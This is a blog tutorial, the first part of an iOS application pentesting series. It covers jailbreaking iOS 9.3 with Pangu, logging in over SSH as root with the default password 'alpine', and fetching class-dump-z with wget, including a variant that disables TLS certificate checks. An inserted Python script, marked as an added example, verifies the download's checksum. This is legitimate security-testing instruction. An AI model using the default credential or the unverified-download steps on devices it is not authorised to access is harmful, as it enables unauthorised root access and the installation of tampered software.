Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-74671873837078009652017-04-11T21:12:00.002+05:302017-04-16T20:33:15.891+05:30 iOS Application Pentesting Part 1 : Setting Up The Attacking Environment<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA4COlyoZd6Lah_EjZ0swUWiwVQGPKuL-L_-b_4a70dp-nMkbJtDjpKolY36u57bVQu_gC-v4IOwx4Rry5M9UlPzsAJtbG7niQOVekJGJuCKfm93GaYQE7T0pGkM5exH7hCIf9KF9OoJY/s1600/100804_iPhoneHack-450x299.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA4COlyoZd6Lah_EjZ0swUWiwVQGPKuL-L_-b_4a70dp-nMkbJtDjpKolY36u57bVQu_gC-v4IOwx4Rry5M9UlPzsAJtbG7niQOVekJGJuCKfm93GaYQE7T0pGkM5exH7hCIf9KF9OoJY/s400/100804_iPhoneHack-450x299.jpg" width="400" /></a></div>
<div style="text-align: center;">
<br /></div>
<h2 style="text-align: center;">
<b>iOS Application Pentesting Part 1 : Introduction To iOS </b></h2>
<div>
<b><br /></b></div>
<div>
<div class="MsoNormal">
<span style="background: white; font-family: 'arial', sans-serif; line-height: 107%;">In this article, we will see the essential tools and environment which we require to perform penetration testing and vulnerability assessment on iOS applications.</span></div>
<div class="MsoNormal">
<span style="background: white; font-family: "arial" , sans-serif; line-height: 107%;"><br /></span></div>
<div class="MsoNormal">
<span style="background: white; font-family: "arial" , sans-serif; line-height: 107%;"><br /></span></div>
<div class="MsoNormal">
<span style="background: white; font-family: "arial" , sans-serif; line-height: 107%;"><b>JailBreaking Your Device : ;) </b></span></div>
<div class="MsoNormal">
<span style="background: white; font-family: "arial" , sans-serif; line-height: 107%;"><b><br /></b></span></div>
<div class="MsoNormal">
<span style="font-family: 'arial', sans-serif;"><span style="background-color: white;">First things first: if you are serious about iOS application pentesting, then you will need a jailbroken device.</span></span></div>
<div class="MsoNormal">
<span style="font-family: 'arial', sans-serif;"><span style="background-color: white;">Below we will see how we can jailbreak an iOS device.</span></span></div>
<div class="MsoNormal">
<span style="font-family: 'arial', sans-serif;"><span style="background-color: white;">iOS jailbreaking has a great history: first Pangu jailbroke iOS, then other teams did the same.</span></span></div>
<div class="MsoNormal">
<span style="font-family: 'arial', sans-serif;"><span style="background-color: white;">To be frank, to jailbreak an iOS device, first you need to check whether your installed iOS version has already been jailbroken or not.</span></span><br />
<span style="font-family: 'arial', sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: 'arial', sans-serif;"><span style="background-color: white;"><b>Note - </b>For this particular tutorial we will use the Xcode Simulator, but it is highly recommended that you get a jailbroken device if you are serious about learning iOS application pentesting.</span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"></span></span><br />
<a name='more'></a><span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: 'arial', sans-serif;"><span style="background-color: white;">In my case, on my iPad Air 2 I am using 9.3, which was jailbroken by the Pangu Team a few months back. You can find that information <a href="http://en.pangu.io/help.html">here</a>.</span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhifdWqswuq1RvmDnmyeHvmKHtn9A9l7Rsyy9JNL7HwJQdWSabc51uQ3FmakSD6oHBDyK85QBws3cQwCJ7l6TzlmHi6qRXVWRBtfMYy47LjuzMk-sUcDaqgBJryKu6IBezjCytiCoDfw4c/s1600/IMG_0083.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhifdWqswuq1RvmDnmyeHvmKHtn9A9l7Rsyy9JNL7HwJQdWSabc51uQ3FmakSD6oHBDyK85QBws3cQwCJ7l6TzlmHi6qRXVWRBtfMYy47LjuzMk-sUcDaqgBJryKu6IBezjCytiCoDfw4c/s640/IMG_0083.PNG" width="480" /></a></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: 'arial', sans-serif;">Every jailbreak is different, so I recommend you check your installed iOS version for jailbreaking.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: 'arial', sans-serif;">Jailbreaking steps for iOS 9.3 are as below (taken from the Pangu website):</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">Preparation:</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">1. Pangu jailbreak IPA file NvwaStone_1.1.ipa available at http://pangu.io .</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">2. Cydia impactor available at http://www.cydiaimpactor.com/ .</span></div>
<div class="MsoNormal">
<span style="font-family: 'arial', sans-serif;">(Special Note: This tool, developed by Saurik, is used to sign the ipa file so that the Pangu jailbreak tool can be executed on iOS devices. Cydia Impactor does not collect your Apple ID and password. All the information is only used for applying for a personal free certificate from Apple.)</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">3. A computer (Cydia impactor runs on all major OSes, including Windows, OS X, and Linux)</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">4. A valid Apple ID. (In case that you do not want to use your current Apple ID to apply the personal certificate for any reason, we suggest you apply a new Apple ID and use it)</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">Option “Use embedded certificate effective until April 2017"</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">• If you choose the option "Use embedded certificate effective until April 2017", Pangu 9 will install an app that is signed by a revoked certificate. Before April 2017, you will not need to reinstall the Pangu jailbreak app.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">• If you want to sign the app with your own certificate, do not select this option.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">Limitations:</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">1. An Apple ID can only apply for a certificate for a limited number of devices.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">2. The certificate will expire in 7 days. If your certificate expires, you need to follow the guide to install the jailbreak IPA again.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">After following those steps, Cydia and Pangu will be displayed on your application menu as below.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjve_e2_4O39bC1QxgtIK3HwLSP0ZMHUQq2K9I6LaXFqubER_4e9Os8iTIbMkcnM0dnHc8fVdpgPkhMGfyhTrXNvkitqEmlAlgtE0XVtR_Q2OCBjJePO07uUWVjHFywuIvssxwVuO-D2U/s1600/IMG_0084.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjve_e2_4O39bC1QxgtIK3HwLSP0ZMHUQq2K9I6LaXFqubER_4e9Os8iTIbMkcnM0dnHc8fVdpgPkhMGfyhTrXNvkitqEmlAlgtE0XVtR_Q2OCBjJePO07uUWVjHFywuIvssxwVuO-D2U/s400/IMG_0084.PNG" width="300" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Now you can open the Cydia app, which hosts tons of applications for jailbroken devices.</span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOTHZCNnIBRaU0fFTT8upHZoZ5qMH0RMatV_5957aKfvnnxhwUij1b3T-pBuG3l-1NQMfdHEkjZEjAGyUNzNNZ1RxTs2Bw_ZdA-H3fXjA5JvRtD1AGjHqYlZZuB5jFUBsPNhgMIKahbQE/s1600/IMG_0079.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOTHZCNnIBRaU0fFTT8upHZoZ5qMH0RMatV_5957aKfvnnxhwUij1b3T-pBuG3l-1NQMfdHEkjZEjAGyUNzNNZ1RxTs2Bw_ZdA-H3fXjA5JvRtD1AGjHqYlZZuB5jFUBsPNhgMIKahbQE/s400/IMG_0079.PNG" width="300" /></a></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><b>Installing Required Apps & Package On Device</b></span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">After jailbreaking the device, we need to install some important apps on it, which will help us perform the pentest on the target app and do various other things.</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Open the Cydia app and search for "OpenSSH".</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Tap on it and tap the Install button; in my case it is already installed, so it shows Modify.</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsd8IC7gaClgMv0aOwpbEekBn7GJvy8LZTWner_cTF96umXiqfLgdwxp4_adaY0iSc1qdZyxuMVp2vvbgviE23g3WXPSGgfUr6W1Qh9A1ud2etCRVEFo9Retc7c5mv-AFXvVo1NktViMc/s1600/Screen+Shot+2017-04-11+at+8.52.48+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsd8IC7gaClgMv0aOwpbEekBn7GJvy8LZTWner_cTF96umXiqfLgdwxp4_adaY0iSc1qdZyxuMVp2vvbgviE23g3WXPSGgfUr6W1Qh9A1ud2etCRVEFo9Retc7c5mv-AFXvVo1NktViMc/s640/Screen+Shot+2017-04-11+at+8.52.48+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7C82uUgQ5jf27exbooLak4AKeW9ObHNDyktYHWiO4RoWjVWUNYPAUrAwRivLZ4MkdKPrzWjkS5dnKcHr7TeDGS406BQ8zPQHJ8GlMVqQJ4Q5RimCYwCTnuHHmK0bCXUrDtwb1yaDUXBM/s1600/Screen+Shot+2017-04-11+at+8.52.37+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7C82uUgQ5jf27exbooLak4AKeW9ObHNDyktYHWiO4RoWjVWUNYPAUrAwRivLZ4MkdKPrzWjkS5dnKcHr7TeDGS406BQ8zPQHJ8GlMVqQJ4Q5RimCYwCTnuHHmK0bCXUrDtwb1yaDUXBM/s640/Screen+Shot+2017-04-11+at+8.52.37+PM.png" width="640" /></a></div>
<br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Let's try to SSH into the device. First, get the device's IP address.</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">For this, go to Settings > Wi-Fi and tap on your access point name.</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGnEqIAoFdgWkFkg9oDJGEnYFG7Cc3xDmBP7Xy8kqkf8Q4hN4cIOfySD6ZZMmlpA_BlcbG-teH0FxjRxgULYCTSpntHKcyVkWlqYCgdM1Q_NQgxavjqzVIwKqXlv05HGh4JpvMJC2pRkM/s1600/Screen+Shot+2017-04-11+at+8.52.26+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="586" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGnEqIAoFdgWkFkg9oDJGEnYFG7Cc3xDmBP7Xy8kqkf8Q4hN4cIOfySD6ZZMmlpA_BlcbG-teH0FxjRxgULYCTSpntHKcyVkWlqYCgdM1Q_NQgxavjqzVIwKqXlv05HGh4JpvMJC2pRkM/s640/Screen+Shot+2017-04-11+at+8.52.26+PM.png" width="640" /></a></div>
<br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">As we can see, the IP is 192.168.0.7. Let's SSH into it as the user root. By default the root password is <b>alpine</b>, but I suggest you change it to one of your own, since this well-known default lets anyone who can reach the device over the network log in as root.</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Command - ssh root@192.168.0.7</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx4JjBydqn06tJOkaG6iKn90RtQYhd0HMhQc-6Rxpgf_UxzMSqSyXP5leTAA7OhrvSdr9BmXSrGO6_EYNmT_4MMyy7fUMqBJGGjUVot5hued-L8UFs004j2m1eAMcYEyZlPtSUdigQKCg/s1600/Screen+Shot+2017-04-11+at+8.27.15+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx4JjBydqn06tJOkaG6iKn90RtQYhd0HMhQc-6Rxpgf_UxzMSqSyXP5leTAA7OhrvSdr9BmXSrGO6_EYNmT_4MMyy7fUMqBJGGjUVot5hued-L8UFs004j2m1eAMcYEyZlPtSUdigQKCg/s640/Screen+Shot+2017-04-11+at+8.27.15+PM.png" width="640" /></a></div>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Great, so we are logged in :)</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Let's continue with the app installation. Next we install BigBoss Recommended Tools, a package that bundles important tools such as GNU Debugger, APT Transitional, Git, make, less, unzip, wget, SQLite etc., which come in very handy for iOS application pentesting.</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixsW1_TjgyzGo44VIyCSTuALM3SFB6B-zf4c37sGsFL9KFh_PUbjSDzd0SjChahRprjJShN03Ldi5tdb45edBMPwxnYhf4bQRRFoHDrovtDHf_1SaW0iUWk7QBgI7xjb6DK239b5EGNDo/s1600/Screen+Shot+2017-04-11+at+8.52.15+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="518" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixsW1_TjgyzGo44VIyCSTuALM3SFB6B-zf4c37sGsFL9KFh_PUbjSDzd0SjChahRprjJShN03Ldi5tdb45edBMPwxnYhf4bQRRFoHDrovtDHf_1SaW0iUWk7QBgI7xjb6DK239b5EGNDo/s640/Screen+Shot+2017-04-11+at+8.52.15+PM.png" width="640" /></a></div>
<br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Now we will install class-dump-z, which allows us to dump class information from an iOS application binary. We can download it from the class-dump-z project page; the direct download link is given below.</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fUKNfnyaQu_PhUkWBrIrioQyqsCBL0ArcMK0dYhIqsMxKUWIpST4r6gTAxAREVO51HrV514oZfKVR2kPulEXDvFFxI7c9XA_otXO19l9DS6wHlyWXjuNjy_BZ43dmgwl7X8K0eNVzfU/s1600/Screen+Shot+2017-04-11+at+8.56.49+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fUKNfnyaQu_PhUkWBrIrioQyqsCBL0ArcMK0dYhIqsMxKUWIpST4r6gTAxAREVO51HrV514oZfKVR2kPulEXDvFFxI7c9XA_otXO19l9DS6wHlyWXjuNjy_BZ43dmgwl7X8K0eNVzfU/s640/Screen+Shot+2017-04-11+at+8.56.49+PM.png" width="640" /></a></div>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">The download can be found <a href="https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/networkpx/class-dump-z_0.2a.tar.gz" target="_blank">here</a> [ <a href="https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/networkpx/class-dump-z_0.2a.tar.gz">https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/networkpx/class-dump-z_0.2a.tar.gz</a> ]</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtNMjQuwMeOJMfU7fHDxGLkNflEhGJoIxgbwUMSq878OrJzq9tnWdWf94nBgjT-lQCNZnJ7HSslfsmZW_nJVITzW_1fICEFFT5tVcMPxi_2U5shyphenhyphenSrI-UEk91gb8ZU0iJeB-voqKOV5Ig/s1600/Screen+Shot+2017-04-11+at+8.57.19+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="234" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtNMjQuwMeOJMfU7fHDxGLkNflEhGJoIxgbwUMSq878OrJzq9tnWdWf94nBgjT-lQCNZnJ7HSslfsmZW_nJVITzW_1fICEFFT5tVcMPxi_2U5shyphenhyphenSrI-UEk91gb8ZU0iJeB-voqKOV5Ig/s640/Screen+Shot+2017-04-11+at+8.57.19+PM.png" width="640" /></a></div>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;">Now SSH into your device and download this file using wget.</span><br />
<span style="font-family: "arial" , sans-serif;"><b>wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/networkpx/class-dump-z_0.2a.tar.gz</b></span><br />
<span style="font-family: "arial" , sans-serif;"><br /></span>
<span style="font-family: "arial" , sans-serif;">If you encounter a certificate verification problem, add --no-check-certificate after the wget command. Be aware that this disables TLS certificate validation, so the downloaded file is no longer authenticated; verify it against a known-good checksum before copying it into /usr/bin.</span><br />
<span style="font-family: "arial" , sans-serif;"><b>wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/networkpx/class-dump-z_0.2a.tar.gz --no-check-certificate</b></span><br />
<span style="font-family: "arial" , sans-serif;"><b><br /></b></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTYw6Otf-HQhyphenhyphen5xG9CKHIs_Z4vw-XoHiAAzpSAaKKM7Pr-r-tofYBqenBJOZayHz4_xz8NUgh4XLlHRS2hbncvksc7zFMf-eXYWTINBP46d1KHni7pK5MJUEwi_kJuzisMUvI2x4jYTrg/s1600/Screen+Shot+2017-04-11+at+9.04.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTYw6Otf-HQhyphenhyphen5xG9CKHIs_Z4vw-XoHiAAzpSAaKKM7Pr-r-tofYBqenBJOZayHz4_xz8NUgh4XLlHRS2hbncvksc7zFMf-eXYWTINBP46d1KHni7pK5MJUEwi_kJuzisMUvI2x4jYTrg/s640/Screen+Shot+2017-04-11+at+9.04.11+PM.png" width="640" /></a></div>
<span style="font-family: "arial" , sans-serif;"><b><br /></b></span>
<span style="font-family: "arial" , sans-serif;">Next extract the downloaded file using tar.</span><br />
<span style="font-family: "arial" , sans-serif;">Command: tar -xvzf class-dump-z_0.2a.tar.gz</span><br />
<span style="font-family: "arial" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhStihvxRsR2PmqBY04Hf1BZGOZ9D7zymBBndaTiYMjeV1LBQbCQLqWjokpf26LvwQhceQvMPZtcv452qa5IN6SnmPgilYOWUKqlAlghUiVjIMAFqpD31-dxp0ubmpZNAJ64QByZaL8DyQ/s1600/Screen+Shot+2017-04-11+at+9.05.53+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhStihvxRsR2PmqBY04Hf1BZGOZ9D7zymBBndaTiYMjeV1LBQbCQLqWjokpf26LvwQhceQvMPZtcv452qa5IN6SnmPgilYOWUKqlAlghUiVjIMAFqpD31-dxp0ubmpZNAJ64QByZaL8DyQ/s640/Screen+Shot+2017-04-11+at+9.05.53+PM.png" width="640" /></a></div>
<span style="font-family: "arial" , sans-serif;"><br /></span>
<span style="font-family: "arial" , sans-serif;"><br /></span>
<span style="font-family: "arial" , sans-serif;">After extracting, go to the iphone_armv6 directory</span><br />
<span style="font-family: "arial" , sans-serif;">and copy the class-dump-z executable into the /usr/bin/ directory.</span><br />
<span style="font-family: "arial" , sans-serif;">Command: <b>cd iphone_armv6</b></span><br />
<span style="font-family: "arial" , sans-serif;">Command: <b>cp class-dump-z /usr/bin/</b></span><br />
<span style="font-family: "arial" , sans-serif;">Command: <b>class-dump-z</b> [enter] (you will see it working)</span><br />
<span style="font-family: "arial" , sans-serif;"><b><br /></b></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6ixQsg8OXL4WYvDvmipksBLonNKWYn-1nnbQ1GO8NIxqeZw7Q-sa9knNhdog-Vqb8tCIZ01GlU03jdm1HgfHBz0gR7VUIXU7Py8o84jCgyxW33GM3c4hRZZjKyYnyH-Q1cp4mOLDvhxI/s1600/Screen+Shot+2017-04-11+at+9.08.48+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6ixQsg8OXL4WYvDvmipksBLonNKWYn-1nnbQ1GO8NIxqeZw7Q-sa9knNhdog-Vqb8tCIZ01GlU03jdm1HgfHBz0gR7VUIXU7Py8o84jCgyxW33GM3c4hRZZjKyYnyH-Q1cp4mOLDvhxI/s640/Screen+Shot+2017-04-11+at+9.08.48+PM.png" width="640" /></a></div>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
</div>
<div>
<b><br /></b>Note: if your device is 32-bit, class-dump-z will work without any issues, but if your device is 64-bit you will see an error when running it.<br />
In that case you have to install "pcre" from the Cydia app. After installing pcre you will be able to use class-dump-z on your 64-bit device.<br />
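A safer way to get the class-dump-z tarball onto the device than trusting an unverified download, as an added example that is not code from this post or from the class-dump-z project: the archive is checked against a SHA-256 digest pinned earlier from a trusted copy (the digest constant below is a placeholder), and only the one expected member, iphone_armv6/class-dump-z as named above, is extracted and installed. The stand-in tarball the script builds for itself is constructed test data, and the install directory is a scratch path standing in for /usr/bin.

```python
"""Pin and verify the class-dump-z tarball before installing it into /usr/bin.

Added example, not code from the post or the class-dump-z project. Fetching the
archive with --no-check-certificate skips TLS validation, so instead the file is
compared against a SHA-256 digest recorded earlier from a trusted copy (the
value below is a placeholder). Only the one expected member is extracted, and it
must be a regular file, so a tampered archive cannot plant anything else.
"""
import hashlib
import io
import os
import shutil
import tarfile
import tempfile

# Placeholder, not a real digest: fill in the SHA-256 of a copy you trust.
PINNED_SHA256 = "<sha256 of trusted class-dump-z_0.2a.tar.gz>"
MEMBER = "iphone_armv6/class-dump-z"   # archive layout as named in the post


def sha256_file(path, chunk_size=1 << 16):
    """Hex SHA-256 of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def install_class_dump_z(tarball, dest_dir, expected_sha256=PINNED_SHA256, member=MEMBER):
    """Verify the archive digest, extract the single binary, and install it 0755.

    Returns the installed path; raises ValueError if the digest does not match
    or the requested member is missing or is not a plain file. Nothing is
    written to dest_dir unless every check passes.
    """
    actual = sha256_file(tarball)
    if actual != expected_sha256:
        raise ValueError(f"digest mismatch: got {actual}, pinned {expected_sha256}")

    with tarfile.open(tarball, "r:gz") as tar:
        try:
            info = tar.getmember(member)
        except KeyError:
            raise ValueError(f"{member} not present in archive") from None
        if not info.isfile():          # refuse symlinks, devices, directories
            raise ValueError(f"{member} is not a regular file")
        os.makedirs(dest_dir, exist_ok=True)
        target = os.path.join(dest_dir, os.path.basename(member))
        with tar.extractfile(info) as src, open(target, "wb") as dst:
            shutil.copyfileobj(src, dst)
    os.chmod(target, 0o755)
    return target


def is_executable(path):
    """The post's last step, "run it and see it works", reduced to a file check."""
    return os.path.isfile(path) and os.access(path, os.X_OK)


def build_sample_tarball(payload=b"#!/bin/sh\necho constructed stand-in for class-dump-z\n"):
    """Constructed archive with the post's layout so the example runs offline."""
    workdir = tempfile.mkdtemp(prefix="class-dump-z-")
    tarball = os.path.join(workdir, "class-dump-z_0.2a.tar.gz")
    with tarfile.open(tarball, "w:gz") as tar:
        info = tarfile.TarInfo(MEMBER)
        info.size = len(payload)
        info.mode = 0o755
        tar.addfile(info, io.BytesIO(payload))
    return workdir, tarball


if __name__ == "__main__":
    workdir, tarball = build_sample_tarball()
    # On a real device dest_dir would be /usr/bin; here it is a scratch directory.
    path = install_class_dump_z(tarball, os.path.join(workdir, "usr", "bin"),
                                expected_sha256=sha256_file(tarball))
    print("installed", path, "executable:", is_executable(path))
```

Run it on the workstation against the real tarball with the pinned digest filled in, then scp the extracted binary to the device instead of running wget with certificate checks disabled on the phone.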
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirl8HgHLu91v-GQ8UsO15A5As_4bruqAk79ejPAfWq_HDV8JCaKj9FvGjIMlZXTgQ65tTQy6PGcfSapPUzPSOXiN76fjdAlz3CtyfVltJ9jDixiv1-kuXfHHe-bnjflwVAhYQ1VKBS7UM/s1600/Screen+Shot+2017-04-12+at+8.56.07+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirl8HgHLu91v-GQ8UsO15A5As_4bruqAk79ejPAfWq_HDV8JCaKj9FvGjIMlZXTgQ65tTQy6PGcfSapPUzPSOXiN76fjdAlz3CtyfVltJ9jDixiv1-kuXfHHe-bnjflwVAhYQ1VKBS7UM/s640/Screen+Shot+2017-04-12+at+8.56.07+PM.png" width="640" /></a></div>
<br />
<b><br /></b>
<b>Lesson learned:</b><br />
<b><br /></b>
We saw how to jailbreak our device and, after that, how to install various apps which will help us in iOS application pentesting.<br />
<br />
Please share and do comment if you have any questions.</div>
<div>
<b><br /></b>
<br />
<div style="text-align: right;">
<b><a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-2-ios.html" target="_blank">Next Post ></a></b></div>
<div style="text-align: right;">
iOS Application Pentesting Part 2 : iOS Application Basics</div>
</div>
<div>
<b><a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-2-ios.html" target="_blank"><br /></a></b></div>
<div>
